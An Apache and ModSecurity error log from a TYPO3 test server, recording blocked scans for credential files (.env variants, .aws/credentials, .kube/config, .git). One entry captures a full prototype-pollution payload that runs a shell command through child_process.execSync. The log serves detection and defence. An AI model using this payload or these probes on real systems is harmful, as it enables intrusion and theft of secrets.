[Fri Dec 05 13:43:38.254441 2025] [authz_core:error] [pid 535951] [client 62.60.131.218:50997] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 13:43:38.315583 2025] [:error] [pid 532216] [client 62.60.131.218:57341] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aTLTeutJvXQe_RlCiczYWAAAAAA"]
[Fri Dec 05 13:43:38.315798 2025] [:error] [pid 532216] [client 62.60.131.218:57341] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aTLTeutJvXQe_RlCiczYWAAAAAA"]
[Fri Dec 05 13:43:38.315976 2025] [:error] [pid 532216] [client 62.60.131.218:57341] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aTLTeutJvXQe_RlCiczYWAAAAAA"]
[Fri Dec 05 13:43:38.362603 2025] [:error] [pid 531700] [client 62.60.131.218:54271] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTLTevjYAO6Jy5EVgXUurAAAAIM"]
[Fri Dec 05 13:43:38.362779 2025] [:error] [pid 531700] [client 62.60.131.218:54271] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTLTevjYAO6Jy5EVgXUurAAAAIM"]
[Fri Dec 05 13:43:38.362945 2025] [:error] [pid 531700] [client 62.60.131.218:54271] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aTLTevjYAO6Jy5EVgXUurAAAAIM"]
[Fri Dec 05 13:43:38.484859 2025] [:error] [pid 535957] [client 62.60.131.218:61559] [client 62.60.131.218] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "aTLTeiytAIKzU33vQQzruAAAAAk"]
[Fri Dec 05 13:43:38.485068 2025] [:error] [pid 535957] [client 62.60.131.218:61559] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "aTLTeiytAIKzU33vQQzruAAAAAk"]
[Fri Dec 05 13:43:38.485231 2025] [:error] [pid 535957] [client 62.60.131.218:61559] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "aTLTeiytAIKzU33vQQzruAAAAAk"]
[Fri Dec 05 13:43:38.498954 2025] [:error] [pid 532216] [client 62.60.131.218:49987] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTLTeutJvXQe_RlCiczYWgAAAAA"]
[Fri Dec 05 13:43:38.499156 2025] [:error] [pid 532216] [client 62.60.131.218:49987] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTLTeutJvXQe_RlCiczYWgAAAAA"]
[Fri Dec 05 13:43:38.499344 2025] [:error] [pid 532216] [client 62.60.131.218:49987] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aTLTeutJvXQe_RlCiczYWgAAAAA"]
[Tue Dec 09 00:19:03.828073 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTdc5yw5dJMtMWYD8PX9owAAAAI"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Tue Dec 09 00:19:03.830132 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTdc5yw5dJMtMWYD8PX9owAAAAI"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Tue Dec 09 00:19:03.830365 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTdc5yw5dJMtMWYD8PX9owAAAAI"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Tue Dec 09 00:19:03.927789 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTdc5yw5dJMtMWYD8PX9pAAAAAI"], referer: http://surf.test.indacotrentino.com/.env
[Tue Dec 09 00:19:03.928186 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTdc5yw5dJMtMWYD8PX9pAAAAAI"], referer: http://surf.test.indacotrentino.com/.env
[Tue Dec 09 00:19:03.928441 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTdc5yw5dJMtMWYD8PX9pAAAAAI"], referer: http://surf.test.indacotrentino.com/.env
[Tue Dec 09 00:19:04.022319 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pQAAAAI"], referer: http://surf.test.indacotrentino.com/.env.example
[Tue Dec 09 00:19:04.022612 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pQAAAAI"], referer: http://surf.test.indacotrentino.com/.env.example
[Tue Dec 09 00:19:04.022810 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pQAAAAI"], referer: http://surf.test.indacotrentino.com/.env.example
[Tue Dec 09 00:19:04.111106 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pgAAAAI"], referer: http://surf.test.indacotrentino.com/.env.local
[Tue Dec 09 00:19:04.111391 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pgAAAAI"], referer: http://surf.test.indacotrentino.com/.env.local
[Tue Dec 09 00:19:04.111600 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pgAAAAI"], referer: http://surf.test.indacotrentino.com/.env.local
[Tue Dec 09 00:19:04.202442 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pwAAAAI"], referer: http://surf.test.indacotrentino.com/.env.backup
[Tue Dec 09 00:19:04.202606 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pwAAAAI"], referer: http://surf.test.indacotrentino.com/.env.backup
[Tue Dec 09 00:19:04.202887 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pwAAAAI"], referer: http://surf.test.indacotrentino.com/.env.backup
[Tue Dec 09 00:19:04.203100 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTdc6Cw5dJMtMWYD8PX9pwAAAAI"], referer: http://surf.test.indacotrentino.com/.env.backup
[Tue Dec 09 00:19:04.290330 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTdc6Cw5dJMtMWYD8PX9qAAAAAI"], referer: http://surf.test.indacotrentino.com/config/.env
[Tue Dec 09 00:19:04.290636 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTdc6Cw5dJMtMWYD8PX9qAAAAAI"], referer: http://surf.test.indacotrentino.com/config/.env
[Tue Dec 09 00:19:04.290832 2025] [:error] [pid 614287] [client 45.86.202.186:33635] [client 45.86.202.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTdc6Cw5dJMtMWYD8PX9qAAAAAI"], referer: http://surf.test.indacotrentino.com/config/.env
[Tue Dec 09 13:59:24.908332 2025] [authz_core:error] [pid 621506] [client 185.177.72.75:52840] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Dec 09 14:05:12.636673 2025] [authz_core:error] [pid 616664] [client 185.177.72.75:60834] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Dec 09 22:24:44.394099 2025] [:error] [pid 616664] [client 35.85.226.201:60518] [client 35.85.226.201] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTiTnLA0yIwbR96rbbSc9gAAAAM"]
[Tue Dec 09 22:24:44.394807 2025] [:error] [pid 616664] [client 35.85.226.201:60518] [client 35.85.226.201] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTiTnLA0yIwbR96rbbSc9gAAAAM"]
[Tue Dec 09 22:24:44.396169 2025] [:error] [pid 616664] [client 35.85.226.201:60518] [client 35.85.226.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTiTnLA0yIwbR96rbbSc9gAAAAM"]
[Tue Dec 09 22:24:44.396366 2025] [:error] [pid 616664] [client 35.85.226.201:60518] [client 35.85.226.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aTiTnLA0yIwbR96rbbSc9gAAAAM"]
[Tue Dec 09 22:39:54.127298 2025] [authz_core:error] [pid 627085] [client 35.231.30.45:34036] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Dec 10 15:57:04.762224 2025] [authz_core:error] [pid 636951] [client 34.125.153.67:56746] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
